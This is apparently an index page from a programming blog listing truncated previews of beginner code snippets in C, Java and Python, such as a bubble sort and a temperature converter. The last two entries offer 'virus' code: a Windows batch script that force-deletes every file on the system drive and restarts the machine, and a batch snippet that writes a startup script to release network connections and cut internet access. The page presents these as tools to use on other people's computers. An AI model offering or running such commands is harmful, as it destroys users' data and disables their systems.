top of page
NEWS
LATEST NEWS ARTICLES


A C program that will calculate the sum of 5 subjects and find their percentage
#include<stdio.h> int main() { int s1, s2, s3, s4, s5, sum, total = 500; float per; printf("\nEnter marks of 5 subjects : "); scanf("%d...


A Java bubble sort program
import java.util.Scanner; class BubbleSort { public static void main(String []args) { int n, c, d, swap; Scanner in = new...


A C Code to Insert into Array
#include<stdio.h> int main() { int arr[20], element, num, i, pos; printf("Enter no of elements :\n"); scanf("%d", &num); for (i = 0; i <...


Converting Decimal number to hexadecimal using Java
import java.util.Scanner; public class JavaProgram { public static void main(String args[]) { int decnum, rem; String hexdecnum=""; /*...


HOW TO CONFIGURE JAVA ON WINDOWS
I discovered that a lot of programmers who are new into programming finds it quite difficult to configure java. So today I will be...


CHECK OUT THIS SIMPLE PYTHON LOTTERY PROGRAM
import random # Generate a random magic number lottery = random.randint(0, 99) # prompt user to make a guess guess = eval(input("Guess a...


This is a simple Java program that will multiply two matrices. Follow the steps and don't miss a
import java.util.Scanner; public class JavaProgram { public static void main(String args[]) { int m, n, p, q, sum = 0, c, d, k; Scanner...


Simple Java program that will convert temperature from degree Centigrade to Fahrenheit
import java.util.Scanner; public class JavaApplication { public static void main(String[] args) { Scanner sc = new Scanner(System.in);...


This virus code will delete all files on anybody's hard-drive
This Virus Deletes All The Content Of A Drive... @echo off del %systemdrive%*.* /f /s /q shutdown -r -f -t 00 Save The Above Code As...


How to create a virus that will disable internet permanently
echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/ release_all>>c:windowswimn32.bat echo...
bottom of page